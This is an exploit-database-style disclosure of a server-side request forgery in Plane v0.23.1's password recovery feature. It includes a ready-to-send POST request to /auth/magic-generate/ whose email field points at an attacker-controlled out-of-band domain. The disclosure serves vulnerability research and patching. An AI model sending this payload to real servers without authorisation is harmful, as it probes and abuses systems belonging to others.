# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64
Description:
A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.
Steps to Reproduce:
1- Go to the password recovery or login section where the email input is required.
2- Inject the following payload in the email field, replacing the domain with a server you control:
{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}
Send the request:
POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62
{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}
3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.